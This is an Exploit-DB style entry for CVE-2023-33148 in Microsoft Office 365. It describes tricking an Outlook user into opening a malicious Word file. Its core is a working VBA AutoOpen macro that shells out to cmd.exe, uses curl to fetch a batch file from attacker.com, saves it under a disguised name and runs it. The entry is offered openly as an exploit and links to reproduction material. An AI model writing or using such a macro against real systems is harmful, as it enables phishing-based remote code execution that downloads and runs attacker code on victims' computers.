Microsoft Office 365 Version 18.2305.1222.0 – Elevation of Privilege + RCE.

• Exploit Database
• 16 阅读

• 作者： nu11secur1ty
  日期： 2023-07-20
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51609/

• ## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.
  ## Author: nu11secur1ty
  ## Date: 07.18.2023
  ## Vendor: https://www.microsoft.com/
  ## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office
  ## Reference: https://portswigger.net/web-security/access-control
  ## CVE-2023-33148
  
  
  ## Description:
  The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to
  Elevation of Privilege.
  The attacker can use this vulnerability to attach a very malicious
  WORD file in the Outlook app which is a part of Microsoft Office 365
  and easily can trick the victim to click on it - opening it and
  executing a very dangerous shell command, in the background of the
  local PC. This execution is without downloading this malicious file,
  and this is a potential problem and a very dangerous case! This can be
  the end of the victim's PC, it depends on the scenario.
  
  ## Staus: HIGH Vulnerability
  
  [+]Exploit:
  
  - Exploit Server:
  
  ```vb
  Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s
  https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat
  && .\salaries.bat", vbNormalFocus)
  End Sub
  
  ```
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)
  
  ## Proof and Exploit
  [href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)
  
  ## Time spend:
  00:35:00